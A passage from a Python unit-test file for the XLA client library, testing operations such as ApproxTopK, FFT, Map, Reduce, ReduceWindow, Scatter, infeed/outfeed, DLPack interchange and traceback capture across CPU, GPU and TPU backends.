],
rtol=1e-4)
def testApproxTopK(self):
if self.backend.platform != "tpu":
self.skipTest("ApproxTopK is only supported on TPU")
k = 10
qy_size = 256
db_size = 3000
feature = 128
recall_target = 0.95
b = self._NewComputation()
p0 = ops.Parameter(b, 0, xla_client.shape_from_pyval(NumpyArrayF32(0)))
q0 = ops.Parameter(b, 1, xla_client.shape_from_pyval(NumpyArrayF32(0)))
ops.Parameter(b, 2, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Parameter(b, 3, xla_client.shape_from_pyval(NumpyArrayS32(0)))
ops.Gt(p0, q0)
comparator = b.build()
qy_shape = [qy_size, feature]
db_shape = [feature, db_size]
rng = np.random.RandomState(0)
qy_arg = rng.randn(*qy_shape).astype(np.float32)
db_arg = rng.randn(*db_shape).astype(np.float32)
b = self._NewComputation()
qy = ops.Parameter(b, 0, xla_client.shape_from_pyval(qy_arg))
db = ops.Parameter(b, 1, xla_client.shape_from_pyval(db_arg))
scores = ops.Dot(qy, db)
iota = ops.Iota(
b,
xla_client.Shape.array_shape(xla_client.PrimitiveType.S32,
(qy_size, db_size)), 1)
init_val = ops.Constant(b, np.float32(-1))
init_arg = ops.Constant(b, np.int32(-1))
ground_truth = ops.TopK(scores, k=k)
approx_topk = ops.ApproxTopK(
b, [scores, iota], [init_val, init_arg],
top_k=k,
reduction_dim=1,
comparator=comparator,
recall_target=recall_target)
ops.Tuple(b, [
ops.GetTupleElement(ground_truth, 1),
ops.GetTupleElement(approx_topk, 1)
])
results = self._Execute(b, [qy_arg, db_arg])
ground_truth_docids = [set(x) for x in results[0]]
hits = sum(
len(list(x for x in approx_topk_per_q
if x in ground_truth_docids[q]))
for q, approx_topk_per_q in enumerate(results[1]))
self.assertGreater(hits / (qy_size * k), recall_target)
def testIsConstant(self):
c = self._NewComputation()
a = ops.Constant(c, np.int32(3))
b = ops.Constant(c, np.int32(1))
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayS32(0)))
const_expr = ops.Sub(b, a)
non_const_expr = ops.Mul(const_expr, x)
self.assertTrue(c.is_constant(const_expr))
self.assertFalse(c.is_constant(non_const_expr))
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
ops.Gather(
ops.Constant(c, a),
ops.Constant(c, indices),
dnums,
slice_sizes=[1, 1])
g, = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
def testFft(self):
if self.backend.platform == "tpu":
self.skipTest("TPU only supports 1D FFT")
shape = [2, 3, 4, 5]
rng = np.random.RandomState(0)
a = rng.randn(*shape) + 1.0j * rng.randn(*shape)
a = a.astype(np.complex64)
# FFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.FFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.fftn(a, axes=(1, 2, 3))], rtol=1e-4)
# IFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.ifftn(a, axes=(1, 2, 3))], rtol=1e-4)
# RFFT
b = rng.randn(*shape).astype(np.float32)
c = self._NewComputation()
ops.Fft(ops.Constant(c, b), xla_client.FftType.RFFT, shape[-3:])
self._ExecuteAndCompareClose(
c, expected=[np.fft.rfftn(b, axes=(1, 2, 3))], rtol=1e-4)
# IRFFT
c = self._NewComputation()
ops.Fft(ops.Constant(c, a), xla_client.FftType.IRFFT, [3, 4, 8])
self._ExecuteAndCompareClose(
c, expected=[np.fft.irfftn(a, axes=(1, 2, 3))], rtol=1e-4)
def testNextAfter(self):
c = self._NewComputation()
ops.NextAfter(
ops.Constant(c, np.array([1, 2], dtype=np.float32)),
ops.Constant(c, np.array([2, 1], dtype=np.float32)))
out, = self._Execute(c, ())
eps = np.finfo(np.float32).eps
np.testing.assert_equal(
np.array([eps + 1, 2 - eps], dtype=np.float32), out)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=in_dtype)).with_major_to_minor_layout_if_absent())
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
c = self._NewComputation("reducer")
shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
shape = shape.with_major_to_minor_layout_if_absent()
ps = [ops.Parameter(c, i, shape) for i in range(4)]
which = ops.Ge(ps[0], ps[2])
ops.Tuple(
c, [ops.Select(which, ps[0], ps[2]),
ops.Select(which, ps[1], ps[3])])
reducer = c.build()
key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operands=[ops.Constant(c, key_array),
ops.Constant(c, val_array)],
init_values=[
ops.Constant(c, np.int32(0)),
ops.Constant(c, np.int32(0))
],
computation=reducer,
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = xla_client.OpSharding.Type.REPLICATED
sharding.tile_assignment_dimensions = [1]
sharding.tile_assignment_devices = [0]
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
self.cpu_backend = (
self.backend
if self.backend.platform == "cpu" else xla_client.make_cpu_client())
self.gpu_backend = (
self.backend if self.backend.platform == "gpu" else None)
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}_gpu={}".format(
FormatShapeAndDtype(shape, dtype), take_ownership, gpu),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership,
"gpu": gpu
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True]
for gpu in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership, gpu):
if gpu and self.gpu_backend is None:
raise unittest.SkipTest("Test not running with GPU support")
backend = self.gpu_backend if gpu else self.cpu_backend
if dtype == np.bool_:
x = np.random.randint(0, 2, size=shape).astype(np.bool_)
else:
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(
dlt, self.cpu_backend, self.gpu_backend)
np.testing.assert_array_equal(
x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
